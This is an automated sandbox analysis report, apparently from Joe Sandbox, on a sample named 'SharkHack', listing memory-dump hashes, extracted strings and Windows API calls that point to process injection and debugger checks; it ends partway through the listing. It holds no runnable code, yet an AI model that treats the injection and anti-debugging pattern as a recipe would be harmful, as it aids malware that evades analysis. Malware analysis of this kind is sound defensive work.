• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: >NG
• API String ID: 0-1926143806
• Opcode ID: 4370db9e3293fecd1a45c856e0d31d3e4bb784c542994f48358052d36e1c684f
• Instruction ID: 00c86722731a1b458ea85245feb446c4ec643a362f5f29b334b8dc4de4581a52
• Opcode Fuzzy Hash: 4370db9e3293fecd1a45c856e0d31d3e4bb784c542994f48358052d36e1c684f
• Instruction Fuzzy Hash: 8B515BB0E052098FCB48DFAAD4406AEFBF2FF89301F14D56AD416B7255D7348941CB69
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID: >NG
• API String ID: 0-1926143806
• Opcode ID: 2a1b0b0d12ecf6e17ceee13c233cfd5cedb86eee88114daf09aa58f820263a59
• Instruction ID: b9cf374b12673d79fdc1a3f33c1a8681f453f2e07553596b48af0a4d33bd29c1
• Opcode Fuzzy Hash: 2a1b0b0d12ecf6e17ceee13c233cfd5cedb86eee88114daf09aa58f820263a59
• Instruction Fuzzy Hash: 99513A70E052098FCB48CFAAD4506AEFBF2FF89301F14D52AD41AB7255D7349A418B69
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
Similarity
• API ID:
• String ID: <
• API String ID: 0-4251816714
• Opcode ID: c90f7572ad50f40ee7a790d103de3d97b3f3c7dc883fa5f0fec1699a716af779
• Instruction ID: bf0c918d62a98927c771394ca7f08e8f040e8d771e2cfa77558c94494116aa45
• Opcode Fuzzy Hash: c90f7572ad50f40ee7a790d103de3d97b3f3c7dc883fa5f0fec1699a716af779
• Instruction Fuzzy Hash: 2C518475E01618CFDB58CFAAC9446DDBBF2AFC9301F14C4AAD409AB264EB345A85CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
Similarity
• API ID:
• String ID: <
• API String ID: 0-4251816714
• Opcode ID: 88c34aa38927afc90343058f71831e4b5a76e5018c3d8be9ac5588bfdd8f4ed1
• Instruction ID: e0141f8e64417204f1d2aaa1e1f96bffb0ba0542508b2c5a68ff4dc42e28da89
• Opcode Fuzzy Hash: 88c34aa38927afc90343058f71831e4b5a76e5018c3d8be9ac5588bfdd8f4ed1
• Instruction Fuzzy Hash: 265185B5E016588FDB58CFAAC9446DDBBF2AFC9301F14C4AAD409AB264DB345A85CF40
Memory Dump Source
• Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f83f7c4d2d0293f598eb37b1e57a8f10e579c82a22b26423c936ff24a18a56d4
• Instruction ID: a96c060d901a55388db6e8659b96a63a83c49e8ac2a2ffe32f026725a24976a9
• Opcode Fuzzy Hash: f83f7c4d2d0293f598eb37b1e57a8f10e579c82a22b26423c936ff24a18a56d4
• Instruction Fuzzy Hash: E0329A31E002159FDB09EFB9D984A5DBBF2FF89300F5185AAD049AB351EE349C46CB52
Memory Dump Source
• Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 340eb753cb89e9ba4e1dc39d056899ab86b8e3e705fb4f42f9c021f6aef0f1b5
• Instruction ID: a49bf0b722cd3e5cd0051635ee16bb39777380b40f37f76d93423b8918c03ed2
• Opcode Fuzzy Hash: 340eb753cb89e9ba4e1dc39d056899ab86b8e3e705fb4f42f9c021f6aef0f1b5
• Instruction Fuzzy Hash: EB228C31E106159FDB08EFB9D984A5DBBF2FF88700F5185AAD049AB350EE349C46CB52
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d35aa1e23004fb318de26ce326a5beafe5c1e1117d1a966624572a562b14107
• Instruction ID: 20c80dce694b88510f1c2d2a476f8defb99c3de77ed23de47d13a9abbb7d1451
• Opcode Fuzzy Hash: 9d35aa1e23004fb318de26ce326a5beafe5c1e1117d1a966624572a562b14107
• Instruction Fuzzy Hash: 96E11674A1566ACFCB64CF69C94479DFBB6BF88340F1095EAD40EAB214DB349E858F00
Memory Dump Source
• Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
Similarity
• API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f2ed2a33f277faab363b2a860142500731803298d87edb10275bc31158a86969
                                                                                                          • Instruction ID: 24aa728e2aa66c3f6a01412ac5be57d2d171efab28d6304d827a324f6ba14a5e
                                                                                                          • Opcode Fuzzy Hash: f2ed2a33f277faab363b2a860142500731803298d87edb10275bc31158a86969
                                                                                                          • Instruction Fuzzy Hash: 156124B0D0022DDFCB08DFA5D954AAEBBF2FB48302F10992ED416AB290D7755A01DF52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f903f711cb6115e3758496bae6083e73197eefd720d5cafa527d217bcc124808
                                                                                                          • Instruction ID: a65297d5a91ac4f36b726e230290f1f8050fd5448c3e24435723300744e2bccd
                                                                                                          • Opcode Fuzzy Hash: f903f711cb6115e3758496bae6083e73197eefd720d5cafa527d217bcc124808
                                                                                                          • Instruction Fuzzy Hash: 905126B0D01218CFDB18DFA6D8846DEBBB2FF88311F1484A9D509AB254CB756A85CF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 59b58b2d4b21af1cc0fd1cb6ebfb4bf90f6ba80ddd5df94fddc0442d2406001b
                                                                                                          • Instruction ID: bcf6dd0bba3844d5dc7fd34ec97c8c4e8a709f32744672787815355460688410
                                                                                                          • Opcode Fuzzy Hash: 59b58b2d4b21af1cc0fd1cb6ebfb4bf90f6ba80ddd5df94fddc0442d2406001b
                                                                                                          • Instruction Fuzzy Hash: 1B416AB0D01258CFDB18DFA6C8806DEBBF2BF88311F14C4AAD409AB254DB755A85CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 62cf2519e5ffea5b3e9c9e6f73bb3e0dfacebe2c05bd806f8d539137139874e5
                                                                                                          • Instruction ID: 2fcdff87d9e70e30e8510da87fa5c0894a8a4ea6b6b38e1fc772b311a7674866
                                                                                                          • Opcode Fuzzy Hash: 62cf2519e5ffea5b3e9c9e6f73bb3e0dfacebe2c05bd806f8d539137139874e5
                                                                                                          • Instruction Fuzzy Hash: 9C41E4B4E04618CBDB18CFAAD8446DEBBF2BFC8310F14C06AD449AB254EB715A85CF54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5a65de9e653b760d25d88fe46b8878293c8a0a0acc4375ca15f49412f475fdb
                                                                                                          • Instruction ID: 08d7fe59360a4267d3c81fd8b4a8fe42d44d719333a3753e380c67a9c29ddf37
                                                                                                          • Opcode Fuzzy Hash: b5a65de9e653b760d25d88fe46b8878293c8a0a0acc4375ca15f49412f475fdb
                                                                                                          • Instruction Fuzzy Hash: 9F31D675E006198FEB58DFAAD84079EBBB7BFC8201F14C1AAD40CA7264DB305A45CF21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: beddf820b10455a70c903bacd7e6b38a21417f6104f2152b94c99200808671d5
                                                                                                          • Instruction ID: b78b9c8abf61bc02016b4d613361f61cb3d36f90a56e1553f50ef930cec0a8a7
                                                                                                          • Opcode Fuzzy Hash: beddf820b10455a70c903bacd7e6b38a21417f6104f2152b94c99200808671d5
                                                                                                          • Instruction Fuzzy Hash: E521E971E016188BEB58CF6BDC4069EFBF7BFC8200F04C1BAC918A6264DB351A468F55

                                                                                                          Control-flow Graph (interactive graph of the function at 87409b0-8740b76 not reproduced; executed / not-executed colouring omitted)
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: G$Te^q$Te^q
                                                                                                          • API String ID: 0-3949708683
                                                                                                          • Opcode ID: 880e541fea52aee40319505f38ed9c6fda9d775f68c67409cd43941b70dd4aaa
                                                                                                          • Instruction ID: 538597f74d58b2405a89b869b21c6ad00178640d65ac48a24f702ce9457f0b2c
                                                                                                          • Opcode Fuzzy Hash: 880e541fea52aee40319505f38ed9c6fda9d775f68c67409cd43941b70dd4aaa
                                                                                                          • Instruction Fuzzy Hash: 0182D030A05215CFD705BB79DC94A5CBBF1FF4A204F8585EAD088E7351DA389D8ACB62
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$(bq$(bq
                                                                                                          • API String ID: 0-2716923250
                                                                                                          • Opcode ID: b239613eb17e772f3848e0b5ec450e436557e2011fb21551167d4fd98447ca1a
                                                                                                          • Instruction ID: 4d2a08196ba8e69a67b04603efe01bb37859ff765fbeac348e40cd11d9c5e49a
                                                                                                          • Opcode Fuzzy Hash: b239613eb17e772f3848e0b5ec450e436557e2011fb21551167d4fd98447ca1a
                                                                                                          • Instruction Fuzzy Hash: F1A17E70A00349DFCB14DFA9C45469EBBF2FF89310F24856DE405AB355DB70A886CBA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq
                                                                                                          • API String ID: 0-4258043069
                                                                                                          • Opcode ID: 09f0defe4775657498ee7db9c474da6883ee64b71a200d730e697f10017a9001
                                                                                                          • Instruction ID: 1cab2cc58bb72b4713817fe38d3099d6d0cd813c39e9aff794ff49258ce1b61d
                                                                                                          • Opcode Fuzzy Hash: 09f0defe4775657498ee7db9c474da6883ee64b71a200d730e697f10017a9001
                                                                                                          • Instruction Fuzzy Hash: A841E420B443845FD749EB79986427F7FFBEFC6200B24846AD005DB396DE349D0683A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 8cc91aacea5804ed5112f7e76eedc4f9972b660a020c166ee94d9e722ab11454
                                                                                                          • Instruction ID: da5fb2e34fbbe497c5d9fab4aebd44b172d20bd626d5d87c90dc6efd08254464
                                                                                                          • Opcode Fuzzy Hash: 8cc91aacea5804ed5112f7e76eedc4f9972b660a020c166ee94d9e722ab11454
                                                                                                          • Instruction Fuzzy Hash: 8B1129757442515FC7066B3CE854A6E3BE6AFC6610B1540ABE005CF3A2CE28DC0BC3A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: TJcq$Te^q
                                                                                                          • API String ID: 0-918715239
                                                                                                          • Opcode ID: 6d6669756b18d62346db9648c351e8beb442af8481e0a42cfcc244c8f44436f7
                                                                                                          • Instruction ID: c920e8dc6b0898b32cea990cb071eda0c8eb83c7f45603a832c69cdaf41b238a
                                                                                                          • Opcode Fuzzy Hash: 6d6669756b18d62346db9648c351e8beb442af8481e0a42cfcc244c8f44436f7
                                                                                                          • Instruction Fuzzy Hash: 59F0F6353401111FCA08A77DE558D3F76DBAFC9A24354405AE50ACF3A0CD65DC038796
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 0ad8311cec72b5be4838c7584addd5ff3d561ea38f8bb3d6ee811d2c3d6aba88
                                                                                                          • Instruction ID: 56a610728cb821f7c3a14d4c11309718cc18066858485e03c85c5048dc45b3a9
                                                                                                          • Opcode Fuzzy Hash: 0ad8311cec72b5be4838c7584addd5ff3d561ea38f8bb3d6ee811d2c3d6aba88
                                                                                                          • Instruction Fuzzy Hash: 83127D74B10214DBC744FFB9E98866DBBF6FB88604F90852DD089A7355DE389C0ACB52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q
                                                                                                          • API String ID: 0-671973202
                                                                                                          • Opcode ID: 1bf025edd520df5213de8ebaa6c2fbfeaaf71762035a42617bec9c32c0b27fe6
                                                                                                          • Instruction ID: 1b7334a76b0a79777ec1149d8090822f8408d91f11fcbf5b3cfa97ff23a1781e
                                                                                                          • Opcode Fuzzy Hash: 1bf025edd520df5213de8ebaa6c2fbfeaaf71762035a42617bec9c32c0b27fe6
                                                                                                          • Instruction Fuzzy Hash: CB026C74B10214DBC744FFB9E98866DBBF6EB88604F90852DD089A7355DE389C0ACB52
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4c^q
                                                                                                          • API String ID: 0-396817635
                                                                                                          • Opcode ID: beb6e2e7ab6c1896db6633a1d9a077a6cbac717369ab77d317d323789d05687b
                                                                                                          • Instruction ID: abd13e8c3300633414d4ed2c88d983c09513397c263dd2e05a33075708bda0ab
                                                                                                          • Opcode Fuzzy Hash: beb6e2e7ab6c1896db6633a1d9a077a6cbac717369ab77d317d323789d05687b
                                                                                                          • Instruction Fuzzy Hash: 2F02AE34B01205CFC704EF78D99456DBBF2FF89204B5184A9D44A9B3A6DB35DC06CB66
                                                                                                          APIs
                                                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 08EFC188
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 4033686569-0
                                                                                                          • Opcode ID: 657bea90205d85551b73114c76bf6225d6ced5e54d3c66eeec3c60bb38916b8c
                                                                                                          • Instruction ID: 23e1193dc8c414d80b941c8ddc56721064c3cb608608cce36dd46df65bd84dab
                                                                                                          • Opcode Fuzzy Hash: 657bea90205d85551b73114c76bf6225d6ced5e54d3c66eeec3c60bb38916b8c
                                                                                                          • Instruction Fuzzy Hash: BD51707190D3D48FCB12CB78D854799BFB0AF07224F2941EBD595EB2A3D2385909C7A2
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 059D16FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: c24fe77ffc3d652cfa90e8f2ace2eabdc3dbb5a4f6245bb9523fde6ba616588c
                                                                                                          • Instruction ID: c594089bd7a0d8d8f6d2a71c081cb3b64968319b3732ec9e23404f224368bcdc
                                                                                                          • Opcode Fuzzy Hash: c24fe77ffc3d652cfa90e8f2ace2eabdc3dbb5a4f6245bb9523fde6ba616588c
                                                                                                          • Instruction Fuzzy Hash: 3C3167719042099FCB10DFA9C884BEEFBF4FF48364F14C42AD859A7291C7789985CBA5
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059D2538
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: bb9ed138ebb641b21b6273aa735a90315e296a2627cd523d7ef74bc86c802f0a
                                                                                                          • Instruction ID: 316b4fa9262264e8d1a29a3546e29451572a3a7ae5f6be4499341f61f97ce9d8
                                                                                                          • Opcode Fuzzy Hash: bb9ed138ebb641b21b6273aa735a90315e296a2627cd523d7ef74bc86c802f0a
                                                                                                          • Instruction Fuzzy Hash: D22126B69002599FCF10DFA9C985BEEBBF5FB48320F10842AE919A7250C7789544CBA4
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 059D2538
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 1bf7cf115b2b01a4144834bd38b91913d1d5eef8f9f1ea94760b38813e125eeb
                                                                                                          • Instruction ID: 24a57ea31babaf0e3011cdf9eec9ba0d88d6b99dabb0b555776cf30772f55d0f
                                                                                                          • Opcode Fuzzy Hash: 1bf7cf115b2b01a4144834bd38b91913d1d5eef8f9f1ea94760b38813e125eeb
                                                                                                          • Instruction Fuzzy Hash: 3A2146B59003499FCB10DFA9C981BDEBBF5FF48310F108429E919A7250C7789944CBA4
                                                                                                          APIs
                                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 060209B7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2882067890.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6020000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                                          • String ID:
                                                                                                          • API String ID: 3662101638-0
                                                                                                          • Opcode ID: 157ac2b3f075b9ef96670b4cd7ed9570f11be33385f05a67fbf9fc9aea7a2a54
                                                                                                          • Instruction ID: 5ca3301a9554048d655d5f0e6be13731539d04ea9105211560349f5ebcfcc941
                                                                                                          • Opcode Fuzzy Hash: 157ac2b3f075b9ef96670b4cd7ed9570f11be33385f05a67fbf9fc9aea7a2a54
                                                                                                          • Instruction Fuzzy Hash: CA2169B2C002598FDB10CF9AD844BEEBBF4EF49320F14842AE855A7251D738A944CFA1
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 059D29BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 8c27db9994df4f7fe483936208b7d407a8ad22c443ad232aa2155baac88ebfb0
                                                                                                          • Instruction ID: d693724f46db475bd796f3a2a714e4ab9fc2f7d471295481450b9ca371fadb4a
                                                                                                          • Opcode Fuzzy Hash: 8c27db9994df4f7fe483936208b7d407a8ad22c443ad232aa2155baac88ebfb0
                                                                                                          • Instruction Fuzzy Hash: F62159B18002499FCB10DFAAC444BEEFBF4EF88320F108429D459A7250C7789545CFA5
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D31AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 219094db600a3355a509e810e9c7d00de492623ef35eeb8bc90e85fa05e5db94
                                                                                                          • Instruction ID: bbbb05726e0e9d2b0a6ba53e7ab067ec5d4ad3daccd0b89c9115d1d331e92594
                                                                                                          • Opcode Fuzzy Hash: 219094db600a3355a509e810e9c7d00de492623ef35eeb8bc90e85fa05e5db94
                                                                                                          • Instruction Fuzzy Hash: 232137B19042099FDB10DFAAC9857EEFBF4EB48324F14C42AD459A7240CB78A944CFA5
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059D31AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 6999fa6009e3a6b553cf4f480cdf4bdb990ef41f0b604a88791f0d13480f5066
                                                                                                          • Instruction ID: f09b37fca9aa15297bc813db36da6fceb81b49343e919c1bb651e78abc086b60
                                                                                                          • Opcode Fuzzy Hash: 6999fa6009e3a6b553cf4f480cdf4bdb990ef41f0b604a88791f0d13480f5066
                                                                                                          • Instruction Fuzzy Hash: C52137B19002099FDB10DFAAC5857EEFBF4AB48324F10C429D459A7240CB78A944CFA5
                                                                                                          APIs
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 059D16FE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 252e900ba7e6b34e856b97394c987d9515e09409d1020418c6ee152c553519bc
                                                                                                          • Instruction ID: a06071733cf53c29a8675412c6c496c735226cb9d02d01df9c7b2a538529356b
                                                                                                          • Opcode Fuzzy Hash: 252e900ba7e6b34e856b97394c987d9515e09409d1020418c6ee152c553519bc
                                                                                                          • Instruction Fuzzy Hash: 2D2137B19003098FDB10DFAAC4857EEFBF4AB48324F148429D459A7251C778A984CFA4
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 08A0FCC3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: e4e1de4e27a2c609786e27a116a9a599d1c241f62546e3fec0707c5e62001894
                                                                                                          • Instruction ID: 00dd51e85e002d5404eb7ed40e8b40fadab5a40a621b35890862f9e0fe2d33d3
                                                                                                          • Opcode Fuzzy Hash: e4e1de4e27a2c609786e27a116a9a599d1c241f62546e3fec0707c5e62001894
                                                                                                          • Instruction Fuzzy Hash: 422147B5D002499FCB20DF9AD484BDEFBF4EB48320F10842AE958A3280C738A544CFA5
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 089C8AA3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 4dc13661653a81c67f3c3525c854333102d619454a5e85776780741558b53385
                                                                                                          • Instruction ID: 0eab8db22600af2db72e12520325bfa564a35f38d2ef9b3ceb844bc70d232692
                                                                                                          • Opcode Fuzzy Hash: 4dc13661653a81c67f3c3525c854333102d619454a5e85776780741558b53385
                                                                                                          • Instruction Fuzzy Hash: A521E5B59002499FCB10DF9AC484BDEFBF4FF48320F148429E958A7251D778A544CFA5
                                                                                                          APIs
                                                                                                          • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 059D29BF
